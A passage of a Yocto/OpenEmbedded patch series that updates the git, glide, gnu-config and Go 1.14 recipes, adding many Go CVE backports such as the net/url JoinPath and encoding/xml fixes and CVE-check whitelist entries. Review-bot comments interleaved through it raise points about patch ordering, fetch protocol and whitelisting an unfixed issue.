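Review bot: The order of the new SRC_URI entries is load-bearing in one place and the recipe does not say so: CVE-2023-25652.patch changes apply.c from blob 4f303bf, which is the blob CVE-2023-23946.patch produces, so it only applies after that patch. Listing CVE-2023-29007.patch between them is harmless because it touches config.c and t/t1300-config.sh only, but it hides the dependency. I would list the three in CVE order, or add `# CVE-2023-25652.patch must follow CVE-2023-23946.patch (both modify apply.c)` above the SRC_URI assignment.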
diff --git a/meta/recipes-devtools/git/git/fixsort.patch b/meta/recipes-devtools/git/git/fixsort.patch
new file mode 100644
index 0000000000..eec1f84945
--- /dev/null
+++ b/meta/recipes-devtools/git/git/fixsort.patch
@@ -0,0 +1,36 @@
+[PATCH] generate-cmdlist.sh: Fix determinism issue
+
+Currently git binaries are not entirely reproducible, at least partly
+due to config-list.h differing in order depending on the system's
+locale settings. Under different locales, the entries:
+
+"sendemail.identity",
+"sendemail.<identity>.*",
+
+would differ in order for example and this leads to differences in
+the debug symbols for the binaries.
+
+This can be fixed by specifying the C locale for the sort in the
+shell script generating the header.
+
+Note: This is a backport of Richard Purdie's original patch for a more
+recent version of git. The offending code in this older version is
+in generate-cmdlist.sh. The upstream current version has this code
+in generate-configlist.sh.
+
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Upstream-Status: Submitted [https://public-inbox.org/git/f029a942dd3d50d85e60bd37d8e454524987842f.camel@linuxfoundation.org/T/#u]
+
+index 71158f7..c137091 100755
+--- a/generate-cmdlist.sh
++++ b/generate-cmdlist.sh
+@@ -82,7 +82,7 @@ static const char *config_name_list[] = {
+ EOF
+ grep -h '^[a-zA-Z].*\..*::$' Documentation/*config.txt Documentation/config/*.txt |
+ sed '/deprecated/d; s/::$//; s/, */\n/g' |
+- sort |
++ LC_ALL=C sort |
+ while read line
+ do
+ echo " \"$line\","
diff --git a/meta/recipes-devtools/git/git_2.24.3.bb b/meta/recipes-devtools/git/git_2.24.4.bb
index ddd875f07b..f38c25f0ef 100644
--- a/meta/recipes-devtools/git/git_2.24.3.bb
+++ b/meta/recipes-devtools/git/git_2.24.4.bb
@@ -5,5 +5,5 @@ EXTRA_OECONF += "ac_cv_snprintf_returns_bogus=no \
"
EXTRA_OEMAKE += "NO_GETTEXT=1"
-SRC_URI[tarball.sha256sum] = "ef6d1d1de1d7921a54d23d07479bd2766f050d6435cea5d3b5322aa4897cb3d7"
-SRC_URI[manpages.sha256sum] = "325795ba33c0be02370de79636f32ad3b447665c1f2b5b4de65181fa804bed31"
+SRC_URI[tarball.sha256sum] = "6e119e70d3762f28e1dc9928c526eb4d7519fd3870f862775cd10186653eb85a"
+SRC_URI[manpages.sha256sum] = "e687bcc91a6fd9cb74243f91a9c2d77c50ce202a09b35931021ecc521a373ed5"
diff --git a/meta/recipes-devtools/glide/glide_0.13.3.bb b/meta/recipes-devtools/glide/glide_0.13.3.bb
index 31295edf90..21773d91f9 100644
--- a/meta/recipes-devtools/glide/glide_0.13.3.bb
+++ b/meta/recipes-devtools/glide/glide_0.13.3.bb
@@ -1,10 +1,11 @@
SUMMARY = "Vendor Package Management for Golang"
-HOMEPAGE = "https://glide.sh"
+HOMEPAGE = "https://github.com/Masterminds/glide"
+DESCRIPTION = "Glide is a Vendor Package Management for Golang"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=54905cf894f8cc416a92f4fc350c35b2"
GO_IMPORT = "github.com/Masterminds/glide"
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master"
SRCREV = "8ed5b9292379d86c39592a7e6a58eb9c903877cf"
inherit go
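Review bot: The updated `SRC_URI` adds `branch=master` but still sets no `protocol`, so the fetch presumably goes over the unauthenticated `git://` transport; the gnu-config hunk further down adds `protocol=https` for the same kind of URL. SRCREV pins the commit, so content integrity does not rest on the transport, but the connection itself is neither encrypted nor authenticated and may be refused by the host. I would write `SRC_URI = "git://${GO_IMPORT};protocol=https;branch=master"`.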
diff --git a/meta/recipes-devtools/gnu-config/gnu-config_git.bb b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
index 48b7e6d4a6..05cd6a1e63 100644
--- a/meta/recipes-devtools/gnu-config/gnu-config_git.bb
+++ b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "gnu-configize"
DESCRIPTION = "Tool that installs the GNU config.guess / config.sub into a directory tree"
+HOMEPAGE = "https://git.savannah.gnu.org/cgit/config.git"
SECTION = "devel"
LICENSE = "GPL-3.0-with-autoconf-exception"
LIC_FILES_CHKSUM = "file://config.guess;beginline=7;endline=27;md5=b75d42f59f706ea56d6a8e00216fca6a"
@@ -11,7 +12,7 @@ INHIBIT_DEFAULT_DEPS = "1"
SRCREV = "5256817ace8493502ec88501a19e4051c2e220b0"
PV = "20200117+git${SRCPV}"
-SRC_URI = "git://git.savannah.gnu.org/config.git \
+SRC_URI = "git://git.savannah.gnu.org/git/config.git;protocol=https;branch=master \
file://gnu-configize.in"
S = "${WORKDIR}/git"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-devtools/go/go-1.14.inc b/meta/recipes-devtools/go/go-1.14.inc
index 8f8ed89de8..9c7ceda891 100644
--- a/meta/recipes-devtools/go/go-1.14.inc
+++ b/meta/recipes-devtools/go/go-1.14.inc
@@ -1,7 +1,7 @@
require go-common.inc
GO_BASEVERSION = "1.14"
-GO_MINOR = ".7"
+GO_MINOR = ".15"
PV .= "${GO_MINOR}"
FILESEXTRAPATHS_prepend := "${FILE_DIRNAME}/go-${GO_BASEVERSION}:"
@@ -16,6 +16,112 @@ SRC_URI += "\
file://0006-cmd-dist-separate-host-and-target-builds.patch \
file://0007-cmd-go-make-GOROOT-precious-by-default.patch \
file://0008-use-GOBUILDMODE-to-set-buildmode.patch \
+ file://CVE-2021-34558.patch \
+ file://CVE-2021-33196.patch \
+ file://CVE-2021-33197.patch \
+ file://CVE-2021-38297.patch \
+ file://CVE-2022-23806.patch \
+ file://CVE-2022-23772.patch \
+ file://CVE-2021-44717.patch \
+ file://CVE-2022-24675.patch \
+ file://CVE-2021-31525.patch \
+ file://CVE-2022-30629.patch \
+ file://CVE-2022-30631.patch \
+ file://CVE-2022-30632.patch \
+ file://CVE-2022-30633.patch \
+ file://CVE-2022-30635.patch \
+ file://CVE-2022-32148.patch \
+ file://CVE-2022-32189.patch \
+ file://CVE-2021-27918.patch \
+ file://CVE-2021-36221.patch \
+ file://CVE-2021-39293.patch \
+ file://CVE-2021-41771.patch \
+ file://CVE-2022-27664.patch \
+ file://0001-CVE-2022-32190.patch \
+ file://0002-CVE-2022-32190.patch \
+ file://0003-CVE-2022-32190.patch \
+ file://0004-CVE-2022-32190.patch \
+ file://CVE-2022-2880.patch \
+ file://CVE-2022-2879.patch \
+ file://CVE-2021-33195.patch \
+ file://CVE-2021-33198.patch \
+ file://CVE-2021-44716.patch \
+ file://CVE-2022-24921.patch \
+ file://CVE-2022-28131.patch \
+ file://CVE-2022-28327.patch \
+ file://CVE-2022-41715.patch \
+ file://CVE-2022-41717.patch \
+ file://CVE-2022-1962.patch \
+ file://CVE-2022-41723.patch \
+ file://CVE-2022-41722-1.patch \
+ file://CVE-2022-41722-2.patch \
+ file://CVE-2020-29510.patch \
+ file://CVE-2023-24537.patch \
+ file://CVE-2023-24534.patch \
+ file://CVE-2023-24538-1.patch \
+ file://CVE-2023-24538-2.patch \
+ file://CVE-2023-24538_3.patch \
+ file://CVE-2023-24538_4.patch \
+ file://CVE-2023-24538_5.patch \
+ file://CVE-2023-24538_6.patch \
+ file://CVE-2023-24539.patch \
+ file://CVE-2023-24540.patch \
+ file://CVE-2023-29405-1.patch \
+ file://CVE-2023-29405-2.patch \
+ file://CVE-2023-29402.patch \
+ file://CVE-2023-29404.patch \
+ file://CVE-2023-29400.patch \
+ file://CVE-2023-29406-1.patch \
+ file://CVE-2023-29406-2.patch \
+ file://CVE-2023-29409.patch \
+ file://CVE-2022-41725-pre1.patch \
+ file://CVE-2022-41725-pre2.patch \
+ file://CVE-2022-41725-pre3.patch \
+ file://CVE-2022-41725.patch \
+ file://CVE-2023-24536_1.patch \
+ file://CVE-2023-24536_2.patch \
+ file://CVE-2023-24536_3.patch \
+ file://CVE-2023-39318.patch \
+ file://CVE-2023-39319.patch \
+ file://CVE-2023-39326.patch \
+ file://CVE-2023-45287-pre1.patch \
+ file://CVE-2023-45287-pre2.patch \
+ file://CVE-2023-45287-pre3.patch \
+ file://CVE-2023-45287.patch \
+ file://CVE-2023-45289.patch \
+ file://CVE-2023-45290.patch \
+ file://CVE-2024-24785.patch \
+ file://CVE-2024-24784.patch \
"
+
SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch"
-SRC_URI[main.sha256sum] = "064392433563660c73186991c0a315787688e7c38a561e26647686f89b6c30e3"
+SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149"
+
+# Upstream don't believe it is a signifiant real world issue and will only
+# fix in 1.17 onwards where we can drop this.
+# https://github.com/golang/go/issues/30999#issuecomment-910470358
+CVE_CHECK_WHITELIST += "CVE-2021-29923"
+
+# this issue affected go1.15 onwards
+# https://security-tracker.debian.org/tracker/CVE-2022-29526
+CVE_CHECK_WHITELIST += "CVE-2022-29526"
+
+# Issue only on windows
+CVE_CHECK_WHITELIST += "CVE-2022-29804"
+CVE_CHECK_WHITELIST += "CVE-2022-30580"
+CVE_CHECK_WHITELIST += "CVE-2022-30634"
+
+# Issue is in golang.org/x/net/html/parse.go, not used in go compiler
+CVE_CHECK_WHITELIST += "CVE-2021-33194"
+
+# Issue introduced in go1.16, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2021-41772"
+
+# Fixes code that was added in go1.16, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2022-30630"
+
+# This is specific to Microsoft Windows
+CVE_CHECK_WHITELIST += "CVE-2022-41716"
+
+# Issue introduced in go1.15beta1, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2022-1705"
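Review bot: The `CVE_CHECK_WHITELIST += "CVE-2021-29923"` entry differs from the others in this hunk: its own comment says upstream only fixes the issue from 1.17, so the code in this 1.14 tree is still affected, whereas the other entries are whitelisted as not applicable (Windows only, introduced in a later release, or code not used). Whitelisting removes it from the cve-check report either way, so the comment should say it is an accepted, unfixed issue, e.g. `# Unfixed in 1.14 (accepted risk): upstream only changes this in 1.17, see link below`. The three "Issue only on windows" entries also carry no reference, unlike their neighbours; a tracker link per CVE would let an auditor confirm the claim.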
diff --git a/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
new file mode 100644
index 0000000000..ad263b8023
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
@@ -0,0 +1,74 @@
+From 755f2dc35a19e6806de3ecbf836fa06ad875c67a Mon Sep 17 00:00:00 2001
+From: Carl Johnson <me@carlmjohnson.net>
+Date: Fri, 4 Mar 2022 14:49:52 +0000
+Subject: [PATCH 1/4] net/url: add JoinPath, URL.JoinPath
+
+Builds on CL 332209.
+
+Fixes #47005
+
+Change-Id: I82708dede05d79a196ca63f5a4e7cb5ac9a041ea
+GitHub-Last-Rev: 51b735066eef74f5e67c3e8899c58f44c0383c61
+GitHub-Pull-Request: golang/go#50383
+Reviewed-on: https://go-review.googlesource.com/c/go/+/374654
+Reviewed-by: Russ Cox <rsc@golang.org>
+Auto-Submit: Russ Cox <rsc@golang.org>
+Trust: Ian Lance Taylor <iant@golang.org>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/604140d93111f89911e17cb147dcf6a02d2700d0]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 23 +++++++++++++++++++++++
+ 1 file changed, 23 insertions(+)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 2880e82..dea8bfe 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -13,6 +13,7 @@ package url
+ import (
+ "errors"
+ "fmt"
++ "path"
+ "sort"
+ "strconv"
+ "strings"
+@@ -1104,6 +1105,17 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ return nil
+ }
+
++// JoinPath returns a new URL with the provided path elements joined to
++// any existing path and the resulting path cleaned of any ./ or ../ elements.
++func (u *URL) JoinPath(elem ...string) *URL {
++ url := *u
++ if len(elem) > 0 {
++ elem = append([]string{u.Path}, elem...)
++ url.setPath(path.Join(elem...))
++ }
++ return &url
++}
++
+ // validUserinfo reports whether s is a valid userinfo string per RFC 3986
+ // Section 3.2.1:
+ // userinfo = *( unreserved / pct-encoded / sub-delims / ":" )
+@@ -1144,3 +1156,14 @@ func stringContainsCTLByte(s string) bool {
+ }
+ return false
+ }
++
++// JoinPath returns a URL string with the provided path elements joined to
++// the existing path of base and the resulting path cleaned of any ./ or ../ elements.
++func JoinPath(base string, elem ...string) (result string, err error) {
++ url, err := Parse(base)
++ if err != nil {
++ return
++ }
++ result = url.JoinPath(elem...).String()
++ return
++}
+--
+2.7.4
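Review bot: CVE-2022-32190 looks not applicable to go 1.14 rather than in need of a fix, because the `JoinPath` function and method the CVE concerns do not exist in this tree until this very patch adds them; 0002, 0003 and 0004 then correct the newly added code. Backporting a new exported API into a stable toolchain widens its surface and diverges from upstream 1.14. If that reading is right, the lighter option is an entry in go-1.14.inc in the style already used there, `# Issue is in JoinPath, which does not exist in 1.14` followed by `CVE_CHECK_WHITELIST += "CVE-2022-32190"`, and dropping the four patches.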
diff --git a/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
new file mode 100644
index 0000000000..1a11cc72bc
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
@@ -0,0 +1,48 @@
+From 985108de87e7d2ecb2b28cb53b323d530387b884 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Thu, 31 Mar 2022 13:21:39 -0700
+Subject: [PATCH 2/4] net/url: preserve a trailing slash in JoinPath
+
+Fixes #52074
+
+Change-Id: I30897f32e70a6ca0c4e11aaf07088c27336efaba
+Reviewed-on: https://go-review.googlesource.com/c/go/+/397256
+Trust: Ian Lance Taylor <iant@golang.org>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matt Layher <mdlayher@gmail.com>
+Trust: Matt Layher <mdlayher@gmail.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/dbb52cc9f3e83a3040f46c2ae7650c15ab342179]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index dea8bfe..3436707 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1107,11 +1107,18 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+
+ // JoinPath returns a new URL with the provided path elements joined to
+ // any existing path and the resulting path cleaned of any ./ or ../ elements.
++// Any sequences of multiple / characters will be reduced to a single /.
+ func (u *URL) JoinPath(elem ...string) *URL {
+ url := *u
+ if len(elem) > 0 {
+ elem = append([]string{u.Path}, elem...)
+- url.setPath(path.Join(elem...))
++ p := path.Join(elem...)
++ // path.Join will remove any trailing slashes.
++ // Preserve at least one.
++ if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
++ p += "/"
++ }
++ url.setPath(p)
+ }
+ return &url
+ }
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
new file mode 100644
index 0000000000..816d914983
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
@@ -0,0 +1,36 @@
+From 2c632b883b0f11084cc247c8b50ad6c71fa7b447 Mon Sep 17 00:00:00 2001
+From: Sean Liao <sean@liao.dev>
+Date: Sat, 9 Jul 2022 18:38:45 +0100
+Subject: [PATCH 3/4] net/url: use EscapedPath for url.JoinPath
+
+Fixes #53763
+
+Change-Id: I08b53f159ebdce7907e8cc17316fd0c982363239
+Reviewed-on: https://go-review.googlesource.com/c/go/+/416774
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Bryan Mills <bcmills@google.com>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf5898ef53d1693aa572da0da746c05e9a6f15c5]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 3436707..73079a5 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1111,7 +1111,7 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ func (u *URL) JoinPath(elem ...string) *URL {
+ url := *u
+ if len(elem) > 0 {
+- elem = append([]string{u.Path}, elem...)
++ elem = append([]string{u.EscapedPath()}, elem...)
+ p := path.Join(elem...)
+ // path.Join will remove any trailing slashes.
+ // Preserve at least one.
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
new file mode 100644
index 0000000000..4bdff3aed4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
@@ -0,0 +1,82 @@
+From f61e428699cbb52bab31fe2c124f49d085a209fe Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 12 Aug 2022 16:21:09 -0700
+Subject: [PATCH 4/4] net/url: consistently remove ../ elements in JoinPath
+
+JoinPath would fail to remove relative elements from the start of
+the path when the first path element is "".
+
+In addition, JoinPath would return the original path unmodified
+when provided with no elements to join, violating the documented
+behavior of always cleaning the resulting path.
+
+Correct both these cases.
+
+ JoinPath("http://go.dev", "../go")
+ // before: http://go.dev/../go
+ // after: http://go.dev/go
+
+ JoinPath("http://go.dev/../go")
+ // before: http://go.dev/../go
+ // after: http://go.dev/go
+
+For #54385.
+Fixes #54635.
+Fixes CVE-2022-32190.
+
+Change-Id: I6d22cd160d097c50703dd96e4f453c6c118fd5d9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/423514
+Reviewed-by: David Chase <drchase@google.com>
+Reviewed-by: Alan Donovan <adonovan@google.com>
+(cherry picked from commit 0765da5884adcc8b744979303a36a27092d8fc51)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/425357
+Run-TryBot: Damien Neil <dneil@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/28335508913a46e05ef0c04a18e8a1a6beb775ec]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 26 ++++++++++++++++----------
+ 1 file changed, 16 insertions(+), 10 deletions(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 73079a5..1e8baf9 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1109,17 +1109,23 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ // any existing path and the resulting path cleaned of any ./ or ../ elements.
+ // Any sequences of multiple / characters will be reduced to a single /.
+ func (u *URL) JoinPath(elem ...string) *URL {
+- url := *u
+- if len(elem) > 0 {
+- elem = append([]string{u.EscapedPath()}, elem...)
+- p := path.Join(elem...)
+- // path.Join will remove any trailing slashes.
+- // Preserve at least one.
+- if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
+- p += "/"
+- }
+- url.setPath(p)
++ elem = append([]string{u.EscapedPath()}, elem...)
++ var p string
++ if !strings.HasPrefix(elem[0], "/") {
++ // Return a relative path if u is relative,
++ // but ensure that it contains no ../ elements.
++ elem[0] = "/" + elem[0]
++ p = path.Join(elem...)[1:]
++ } else {
++ p = path.Join(elem...)
+ }
++ // path.Join will remove any trailing slashes.
++ // Preserve at least one.
++ if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
++ p += "/"
++ }
++ url := *u
++ url.setPath(p)
+ return &url
+ }
+
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
new file mode 100644
index 0000000000..e1c9e0bdb9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
@@ -0,0 +1,65 @@
+From a0bf4d38dc2057d28396594264bbdd43d412de22 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Tue, 27 Oct 2020 00:21:30 +0100
+Subject: [PATCH] encoding/xml: replace comments inside directives with a space
+
+A Directive (like <!ENTITY xxx []>) can't have other nodes nested inside
+it (in our data structure representation), so there is no way to
+preserve comments. The previous behavior was to just elide them, which
+however might change the semantic meaning of the surrounding markup.
+Instead, replace them with a space which hopefully has the same semantic
+effect of the comment.
+
+Directives are not actually a node type in the XML spec, which instead
+specifies each of them separately (<!ENTITY, <!DOCTYPE, etc.), each with
+its own grammar. The rules for where and when the comments are allowed
+are not straightforward, and can't be implemented without implementing
+custom logic for each of the directives.
+
+Simply preserving the comments in the body of the directive would be
+problematic, as there can be unmatched quotes inside the comment.
+Whether those quotes are considered meaningful semantically or not,
+other parsers might disagree and interpret the output differently.
+
+This issue was reported by Juho Nurminen of Mattermost as it leads to
+round-trip mismatches. See #43168. It's not being fixed in a security
+release because round-trip stability is not a currently supported
+security property of encoding/xml, and we don't believe these fixes
+would be sufficient to reliably guarantee it in the future.
+
+Fixes CVE-2020-29510
+Updates #43168
+
+Change-Id: Icd86c75beff3e1e0689543efebdad10ed5178ce3
+Reviewed-on: https://go-review.googlesource.com/c/go/+/277893
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Trust: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/a9cfd55e2b09735a25976d1b008a0a3c767494f8
+CVE: CVE-2020-29510
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/encoding/xml/xml.go | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
+index 01a1460..98647b2 100644
+--- a/src/encoding/xml/xml.go
++++ b/src/encoding/xml/xml.go
+@@ -768,6 +768,12 @@ func (d *Decoder) rawToken() (Token, error) {
+ }
+ b0, b1 = b1, b
+ }
++
++ // Replace the comment with a space in the returned Directive
++ // body, so that markup parts that were separated by the comment
++ // (like a "<" and a "!") don't get joined when re-encoding the
++ // Directive, taking new semantic meaning.
++ d.buf.WriteByte(' ')
+ }
+ }
+ return Directive(d.buf.Bytes()), nil
+--
+2.7.4
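Review bot: Listing this patch in `SRC_URI` will make cve-check report CVE-2020-29510 as patched, yet the patch description itself says the change is not believed sufficient to reliably guarantee round-trip stability of encoding/xml. The header should carry that caveat for whoever audits the report, for example a line such as `Note: addresses the reported case only; round-trip stability of encoding/xml is still not a supported security property`. Code that re-encodes parsed XML before making a security decision still needs its own validation after this backport.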
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
new file mode 100644
index 0000000000..faa3f7f641
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
@@ -0,0 +1,191 @@
+From d0b79e3513a29628f3599dc8860666b6eed75372 Mon Sep 17 00:00:00 2001
+From: Katie Hockman <katie@golang.org>
+Date: Mon, 1 Mar 2021 09:54:00 -0500
+Subject: [PATCH] encoding/xml: prevent infinite loop while decoding
+
+This change properly handles a TokenReader which
+returns an EOF in the middle of an open XML
+element.
+
+Thanks to Sam Whited for reporting this.
+
+Fixes CVE-2021-27918
+Fixes #44913
+
+Change-Id: Id02a3f3def4a1b415fa2d9a8e3b373eb6cb0f433
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1004594
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Filippo Valsorda <valsorda@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/300391
+Trust: Katie Hockman <katie@golang.org>
+Run-TryBot: Katie Hockman <katie@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Alexander Rakoczy <alex@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+
+https://github.com/golang/go/commit/d0b79e3513a29628f3599dc8860666b6eed75372
+CVE: CVE-2021-27918
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/encoding/xml/xml.go | 19 ++++---
+ src/encoding/xml/xml_test.go | 104 +++++++++++++++++++++++++++--------
+ 2 files changed, 92 insertions(+), 31 deletions(-)
+
+diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
+index adaf4daf198b9..6f9594d7ba7a3 100644
+--- a/src/encoding/xml/xml.go
++++ b/src/encoding/xml/xml.go
+@@ -271,7 +271,7 @@ func NewTokenDecoder(t TokenReader) *Decoder {
+ // it will return an error.
+ //
+ // Token implements XML name spaces as described by
+-// https://www.w3.org/TR/REC-xml-names/. Each of the
++// https://www.w3.org/TR/REC-xml-names/. Each of the
+ // Name structures contained in the Token has the Space
+ // set to the URL identifying its name space when known.
+ // If Token encounters an unrecognized name space prefix,
+@@ -285,16 +285,17 @@ func (d *Decoder) Token() (Token, error) {
+ if d.nextToken != nil {
+ t = d.nextToken
+ d.nextToken = nil
+- } else if t, err = d.rawToken(); err != nil {
+- switch {
+- case err == io.EOF && d.t != nil:
+- err = nil
+- case err == io.EOF && d.stk != nil && d.stk.kind != stkEOF:
+- err = d.syntaxError("unexpected EOF")
++ } else {
++ if t, err = d.rawToken(); t == nil && err != nil {
++ if err == io.EOF && d.stk != nil && d.stk.kind != stkEOF {
++ err = d.syntaxError("unexpected EOF")
++ }
++ return nil, err
+ }
+- return t, err
++ // We still have a token to process, so clear any
++ // errors (e.g. EOF) and proceed.
++ err = nil
+ }
+-
+ if !d.Strict {
+ if t1, ok := d.autoClose(t); ok {
+ d.nextToken = t
+diff --git a/src/encoding/xml/xml_test.go b/src/encoding/xml/xml_test.go
+index efddca43e9102..5672ebb375f0d 100644
+--- a/src/encoding/xml/xml_test.go
++++ b/src/encoding/xml/xml_test.go
+@@ -33,30 +33,90 @@ func (t *toks) Token() (Token, error) {
+
+ func TestDecodeEOF(t *testing.T) {
+ start := StartElement{Name: Name{Local: "test"}}
+- t.Run("EarlyEOF", func(t *testing.T) {
+- d := NewTokenDecoder(&toks{earlyEOF: true, t: []Token{
+- start,
+- start.End(),
+- }})
+- err := d.Decode(&struct {
+- XMLName Name `xml:"test"`
+- }{})
+- if err != nil {
+- t.Error(err)
++ tests := []struct {
++ name string
++ tokens []Token
++ ok bool
++ }{
++ {
++ name: "OK",
++ tokens: []Token{
++ start,
++ start.End(),
++ },
++ ok: true,
++ },
++ {
++ name: "Malformed",
++ tokens: []Token{
++ start,
++ StartElement{Name: Name{Local: "bad"}},
++ start.End(),
++ },
++ ok: false,
++ },
++ }
++ for _, tc := range tests {
++ for _, eof := range []bool{true, false} {
++ name := fmt.Sprintf("%s/earlyEOF=%v", tc.name, eof)
++ t.Run(name, func(t *testing.T) {
++ d := NewTokenDecoder(&toks{
++ earlyEOF: eof,
++ t: tc.tokens,
++ })
++ err := d.Decode(&struct {
++ XMLName Name `xml:"test"`
++ }{})
++ if tc.ok && err != nil {
++ t.Fatalf("d.Decode: expected nil error, got %v", err)
++ }
++ if _, ok := err.(*SyntaxError); !tc.ok && !ok {
++ t.Errorf("d.Decode: expected syntax error, got %v", err)
++ }
++ })
+ }
+- })
+- t.Run("LateEOF", func(t *testing.T) {
+- d := NewTokenDecoder(&toks{t: []Token{
+- start,
+- start.End(),
+- }})
+- err := d.Decode(&struct {
+- XMLName Name `xml:"test"`
+- }{})
+- if err != nil {
+- t.Error(err)
++ }
++}
++
++type toksNil struct {
++ returnEOF bool
++ t []Token
++}
++
++func (t *toksNil) Token() (Token, error) {
++ if len(t.t) == 0 {
++ if !t.returnEOF {
++ // Return nil, nil before returning an EOF. It's legal, but
++ // discouraged.
++ t.returnEOF = true
++ return nil, nil
+ }
+- })
++ return nil, io.EOF
++ }
++ var tok Token
++ tok, t.t = t.t[0], t.t[1:]
++ return tok, nil
++}
++
++func TestDecodeNilToken(t *testing.T) {
++ for _, strict := range []bool{true, false} {
++ name := fmt.Sprintf("Strict=%v", strict)
++ t.Run(name, func(t *testing.T) {
++ start := StartElement{Name: Name{Local: "test"}}
++ bad := StartElement{Name: Name{Local: "bad"}}
++ d := NewTokenDecoder(&toksNil{
++ // Malformed
